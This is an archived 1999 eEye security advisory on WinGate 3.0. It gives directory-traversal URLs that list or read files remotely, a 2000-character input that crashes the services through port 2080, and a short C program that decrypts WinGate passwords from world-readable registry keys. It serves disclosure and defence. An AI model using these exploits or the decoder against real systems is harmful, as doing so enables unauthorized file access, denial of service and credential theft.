At first we were just going to post this advisory to our website but after the subject came up on the NTSEC list and we got a few emails telling us to post it to the other lists... well here it is. Signed, Marc eEye Digital Security Team http://www.eEye.com P.S. Go see Matrix. ________________________________________________________________________ eEye Digital Security Team <e> www.eEye.com infoat_private February 22, 1999 ________________________________________________________________________ Multiple WinGate Vulnerabilities Systems Affected WinGate 3.0 Release Date February 22, 1999 Advisory Code AD02221999 ________________________________________________________________________ Description: ________________________________________________________________________ WinGate 3.0 has three vulnerabilities. Read any file on the remote system. 1. Read any file on the remote system. 2. DoS the WinGate service. 3. Decrypt WinGate passwords. ________________________________________________________________________ Read any file on the remote system ________________________________________________________________________ We were debating if we should add this to the advisory or not. We figured it would not hurt so here it is. The WinGate Log File service in the past has had holes were you can read any file on the system and the holes still seem to be there and some new ways of doing it have cropped up. http://www.server.com:8010/c:/ - NT/Win9x http://www.server.com:8010// - NT/Win9x http://www.server.com:8010/..../ - Win9x Each of the above URLs will list all files on the remote machine. There are a few reasons why we were not sure if we were going to post this information. By default all WinGate services are set so that only 127.0.0.1 can use the service. However the use for the log file service is to let users remotely view the logs so therefore chances are people using the log file service are not going to be leaving it on 127.0.0.1. Also by default in the WinGate settings "Browse" is enabled. We are not sure if the developers intended the Browse option to mean the whole hard drive. We would hope not. The main reason we did put this in the advisory is the fact that the average person using WinGate (Cable Modem Users etc..) are not the brightest of people and they will open the Log Service so that everyone has access to it. We understand there are papers out there saying not to do this and even the program it self says not to, but the average person will not let this register in their head as a bad thing so the software should at least make it as secure as possible. Letting people read any file is not living to that standard. Any way, lets move on... ________________________________________________________________________ DoS the WinGate Service ________________________________________________________________________ The Winsock Redirector Service sits on port 2080. When you connect to it and send 2000 characters and disconnect it will crash all WinGate services. O Yippee ________________________________________________________________________ Decrypt the WinGate passwords ________________________________________________________________________ The registry keys where WinGate stores its passwords are insecure and let everyone read them. Therefore anyone can get the passwords and decrypt them. Code follows. ________________________________________________________________________ // ChrisAat_private // Mikeat_private #include "stdafx.h" #include <stdio.h> #include <string.h> main(int argc, char *argv[]) { char i; for(i = 0; i < strlen(argv[1]); i++) putchar(argv[1][i]^(char)((i + 1) << 1)); return 0; } ________________________________________________________________________ You get the idea... It is good that WinGate 3.0 by default locks down all services to 127.0.0.1. However, there still seems to be holes were if one gets access to the WinGate service, non-blocked ip, they can do some damage. Chances are if you poke hard at some of the other services you will find similar problems as above. Software developers need to remember that the avg. user is not all ways the brightest so our products security must be as tight as possible. ________________________________________________________________________ Vendor Status ________________________________________________________________________ Contacted a month or so ago, have heard nothing. Someone from the NTSEC list contact eval-supportat_private with our findings and they were sent an email back rather quickly. We had sent our emails to supportat_private and things of the such. Maybe all three of our emails just got lost. The last we've heard WinGate is taking steps to fix the problem. Look for patches soon. ________________________________________________________________________ Copyright (c) 1999 eEye Digital Security Team ________________________________________________________________________ Permission is hereby granted for the redistribution of this alert electronically. It is not to be edited in any way without express consent of eEye. If you wish to reprint the whole or any part of this alert in any other medium excluding electronic medium, please e-mail alertat_private for permission. ________________________________________________________________________ Disclaimer: ________________________________________________________________________ The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk. Please send suggestions, updates, and comments to: eEye Digital Security Team infoat_private http://www.eEye.com
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:41:33 PDT